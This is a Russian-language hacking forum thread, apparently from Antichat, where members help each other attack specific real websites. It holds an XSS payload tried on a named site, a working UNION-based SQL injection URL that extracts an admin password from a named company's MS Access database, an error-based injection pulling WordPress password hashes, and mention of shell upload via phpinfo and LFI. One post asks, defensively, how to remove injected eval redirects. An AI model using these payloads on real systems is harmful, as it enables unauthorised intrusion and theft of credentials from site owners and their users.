Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    http://www.cmd5.org/
     
    _________________________
  2. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Спасибо
     
  3. vladimircape

    vladimircape New Member

    Joined:
    12 Sep 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите что можно сделать
    http://www.mywed.ru/photographer/popular/
    вбивая в строку поиска
    '"><script>alert('a');</script>
    нажимаем найти получаем ошибку, и потом кликаем на ссылку войти
    отрабатывает alert()
    Как это использовать можно.
     
  4. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Там PostgreSQL, можно инъекцию провести.
     
  5. vladimircape

    vladimircape New Member

    Joined:
    12 Sep 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Но как я понял по ошибкам там Zend фреймворк и используется PDO, просто там не получится.
     
  6. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Помогиет кто-нить раскурить эту ссылку... Если не трудно в ЛС... что и как вы сделали... там вроде как MSAccess но с данной СУБД у меня ничего не получается((
    Code:
    http://www.mooeraudio.com/en/ProductInfo.asp?id=13
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Угу. Это MsAccess

    _ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,111222333444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminuser%00

    _ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,(select+top+1+cstr([adminpwd])+from+(select+top+1+*+from+(select+top+1+*+from+[adminuser]+order+by+1)+t+order+by+1+desc)t),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminuser%00

    4 самых важных момента

    1) Выборка всегда должна идти из какой-либо таблицы, иначе запрос некорректен
    2) Для отсечения зпроса работает только нулл байт %00 или %16
    3) Все таблицы/колонки подбираются в слепую, при условии что не доступны сисемные таблички.
    4) Для конвертирования получаемых данных в строковый тип используй cstr()
     
    _________________________
    #21567 BigBear, 15 Dec 2012
    Last edited: 15 Dec 2012
    2 people like this.
  8. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Приветствую, помогающие!
    Подскажите как быстро избавится от eval, в скриптах? Очень часто сталкиваюсь, что весь joomla сайт, включая системные скрипты, файлов шаблонов подвержен вставкам eval. Скорее всего вставляют автоматом, т.к. все в одном месте (расположение eval'ов), все eval одни и те же - редиректят мобильный траф.
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Тебе поможет suhosin-extension
    Вот можешь здесь почитать про его настройки
     
  10. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://cs.man1a.com/e107_files/cache/phpinfo.php
    уязвимы?
     
  11. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    кто?
     
  12. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Заливка шелла через phpinfo + LFI
     
  13. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    ну если на сайте есть LFI то да
     
  14. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю '%20group%20by%201%20-- во все параметры, а потом '%20group%20by%201000%20--, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.
     
  15. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Ребят помогите разобрать запрос :
    нужно чтоб выводил (user_login,0x7e,user_pass) where+ID=1
    никак не разберу.
    Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)

    1%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20%28select%20concat%280x27%2C0x7e%2Cwp_users.user_pass%2C0x27%2C0x7e%29%20from%20%60kazachstan%60.wp_users%20Order%20by%20user_login%20limit%200%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    А если %20 фильтруется ? А если -- ?? А если group by ?

    Абсолютно неверный подход имхо.

    notepad.exe - Win+R - Заменить (%20) на (+)

    Аналогично всё остальное
     
    _________________________
  17. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Угу, а какой тогда перспективнее?
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Именно в этом скрипте не нашел уязвимость, зато нашел тут:
     
    _________________________
    1 person likes this.
  19. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Как вывести несколько строчек из бд при выводе через ошибки?
    Или допустим сначал 1 потом 2
    Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку
     
  20. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    попробуйте limit 1,1. Должно вывести вторую, а limit 2,1 -- третью.
     
    1 person likes this.
Thread Status:
Not open for further replies.